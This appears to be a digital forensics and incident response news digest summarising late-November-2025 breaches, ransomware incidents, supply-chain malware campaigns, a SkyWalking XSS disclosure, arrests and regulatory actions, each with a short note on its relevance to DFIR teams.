OpenAI discloses Mixpanel analytics incident — OpenAI disclosed that analytics vendor Mixpanel was compromised and briefly accessed some customer billing and usage data after a phishing attack against its staff on 27-11-2025 [Global]. The incident highlights how third-party SaaS telemetry platforms can become high-value targets, pushing DFIR teams to tighten vendor monitoring, log retention, and data minimisation around analytics feeds (Source: OpenAI, 27-11-2025).

SEBI signs MoU with NFSU to bolster cyber forensics — India’s securities regulator SEBI signed a memorandum of understanding with the National Forensic Sciences University on 26-11-2025 to strengthen joint digital forensics and cyber investigation capabilities for capital markets supervision [APAC]. For DFIR practitioners this signals growing regulator expectations around high-quality forensic evidence, chain-of-custody, and specialist tooling in financial-sector probes (Source: Taxmann, 26-11-2025).

Georgia court-records authority limits access after ransomware threat — Georgia’s Superior Court Clerks’ Cooperative Authority activated incident response plans and temporarily limited access to its eFiling and records systems after a ransomware threat was flagged by the FBI on 25-11-2025 [AMER]. The case underlines how early law-enforcement intelligence and rapid isolation of court and justice systems can reduce downstream evidential risk and help DFIR teams preserve critical records (Source: Atlanta News First, 25-11-2025).

Poland detains Russian suspected of hacking e-commerce databases — Polish authorities announced on 27-11-2025 that they had arrested a 23-year-old Russian national accused of hacking e-commerce databases and corporate IT networks across Poland and other EU states [EMEA]. The arrest demonstrates how long-running intrusion campaigns against online retailers are now being rolled up through coordinated cybercrime investigations, giving DFIR teams valuable insight into tools, infrastructure, and data-theft patterns (Source: The Cyber Express, 27-11-2025).

Russia charges cybersecurity entrepreneur with treason — Russian security services reportedly detained a young cybersecurity entrepreneur on treason charges linked to alleged unauthorised sharing of technical data with foreign organisations on 25-11-2025 [EMEA]. The case reflects rising pressure on independent security researchers in some jurisdictions, complicating cross-border collaboration and threat-intel sharing that many DFIR teams rely on (Source: Recorded Future News, 25-11-2025).

Asahi breach exposes over 1.5 million people’s data — Japanese drinks giant Asahi confirmed that a ransomware attack on its domestic datacentre exposed personal data on about 1.5 million customers, employees and external contacts, with full recovery of operations not expected until early 2026 after an incident first detected on 29-09-2025 but detailed further on 27-11-2025 [APAC]. The breach underscores how deeply embedded OT–IT dependencies in manufacturing can prolong recovery and widen privacy exposure, demanding that DFIR teams coordinate closely with plant operations and data-protection officers (Source: Computing, 27-11-2025).

Iberia discloses supplier-linked data breach affecting frequent flyers — Spanish flag carrier Iberia notified customers of a data security incident disclosed on 24-11-2025 after a third-party supplier was compromised, exposing names, email addresses and loyalty numbers tied to frequent-flyer accounts [EMEA]. The case illustrates the aviation sector’s growing reliance on external service providers and the need for DFIR teams to treat airline supply chains as part of the critical incident surface, including dark-web monitoring and vendor breach playbooks (Source: Cybernews, 25-11-2025).

CodeRED cyberattack disrupts US emergency alert systems — Risk-management firm Crisis24 confirmed that its OnSolve CodeRED emergency alert platform suffered a cyberattack disclosed on 25-11-2025 that disrupted emergency notification services used by local governments, police and fire agencies across the United States [AMER]. For incident responders this is a stark example of how attacks on SaaS-hosted public-safety platforms can create real-world safety impacts, elevating the priority of resilience testing and offline contingency channels (Source: BleepingComputer, 25-11-2025).

Cyber incident hits three London councils sharing IT services — Three London local authorities that share IT services—Kensington and Chelsea, Westminster, and Hammersmith and Fulham—reported on 26-11-2025 that a cybersecurity “issue” had disrupted multiple systems including phone lines, triggering business-continuity and emergency plans [EMEA]. The incident highlights the systemic risk created by shared municipal platforms and the importance for DFIR teams of mapping cross-council dependencies before an attack hits (Source: Recorded Future News, 26-11-2025).

OtterCookie supply-chain malware targets npm, GitHub and Vercel — Researchers reported on 27-11-2025 that North Korean state-linked actors are pushing an “OtterCookie” malware campaign by publishing hundreds of malicious npm packages and using GitHub and Vercel infrastructure to target JavaScript and Web3 developers [Global]. The operation shows how software-supply-chain compromises now blend developer-tooling abuse and social engineering, requiring DFIR and threat-hunting teams to baseline package usage and monitor build systems for anomalous dependencies (Source: Cyber Security News, 27-11-2025).

Flexible Ferret macOS malware spread via fake LinkedIn jobs — New research published on 26-11-2025 revealed a macOS malware chain dubbed Flexible Ferret that uses fake LinkedIn job offers and bogus FFmpeg updates to trick jobseekers into running curl commands that install a persistent backdoor [Global]. The campaign demonstrates how attackers are industrialising “Contagious Interview” social-engineering techniques, meaning DFIR teams must scrutinise terminal histories, LaunchAgents and LinkedIn-sourced lures in investigations involving compromised developer Macs (Source: Malwarebytes, 26-11-2025).

Apache SkyWalking XSS flaw tracked as CVE-2025-54057 — Apache disclosed CVE-2025-54057 on 27-11-2025, a cross-site scripting flaw in SkyWalking versions up to 10.2.0 caused by improper neutralisation of script-related HTML tags in web pages [Global]. Because SkyWalking is widely used for observability in microservices environments, DFIR and platform teams should prioritise upgrading to 10.3.0, review APM dashboards for signs of tampering, and treat observability consoles as potential post-exploitation targets (Source: NVD / Apache, 27-11-2025).

Polish police arrest Russian suspect accused of hacking corporate IT networks — Police in Kraków announced on 27-11-2025 that they had arrested a Russian national suspected of hacking into the IT systems and databases of Polish companies and online shops, potentially affecting victims across the EU [EMEA]. The case shows how specialised cybercrime units and interior ministries are increasingly public about major arrests, giving DFIR teams fresh indicators and context to correlate with intrusion telemetry in regional investigations (Source: The Cyber Express, 27-11-2025).

UK NCSC issues open letter on cyber basics for small businesses — The UK’s National Cyber Security Centre and partners issued an open letter on 26-11-2025 urging small and medium-sized businesses to adopt basic cyber controls such as MFA, patching and backups, warning that opportunistic attacks are increasingly crippling under-resourced firms [EMEA]. For CISOs and DFIR leads this provides an authoritative checklist for baseline controls and underlines that even “non-critical” organisations will face heightened expectations from regulators and insurers after incidents (Source: NCSC, 26-11-2025).

Thailand bans Worldcoin iris scans and orders biometric data deletion — Thailand’s Personal Data Protection Committee ordered Worldcoin on 26-11-2025 to stop scanning people’s irises in the country and delete any biometric data previously collected, citing privacy and security concerns [APAC]. This decision adds to regulatory headwinds for biometric-based crypto schemes and reminds DFIR and privacy teams that high-risk data such as biometrics can quickly become a focal point in cross-border investigations (Source: Recorded Future News, 26-11-2025).

US lawmakers float new draft children’s online safety bill — The US House Energy and Commerce Committee released a new draft children’s online safety bill on 26-11-2025 that would impose stricter requirements on platforms to detect and mitigate harms to under-18s [AMER]. If enacted, this could drive new logging, age-assurance and incident-reporting duties for online services, meaning DFIR teams will need to design investigations and data-retention policies that satisfy both safety regulators and privacy law (Source: Recorded Future News, 26-11-2025).

Net Insight earns ISO/IEC 27001 certification — Swedish media-transport specialist Net Insight announced on 27-11-2025 that it has achieved ISO/IEC 27001 certification for its information-security management system covering product development and cloud services [EMEA]. The certification shows how broadcast-technology vendors are aligning with formal security baselines, giving DFIR and procurement teams stronger levers to demand documented controls and audit evidence from suppliers (Source: Net Insight, 27-11-2025).

Quttera launches evidence-as-code API for SOC 2 and PCI DSS — Website security firm Quttera introduced a “QES Evidence-as-Code” API in late November 2025 to automate the collection of forensically sound evidence and compliance artefacts for frameworks such as SOC 2 and PCI DSS [Global]. This type of tooling can significantly reduce manual evidence-gathering during post-incident audits, allowing DFIR teams to plug findings directly into GRC workflows and continuous-compliance pipelines (Source: Quttera, 26-11-2025).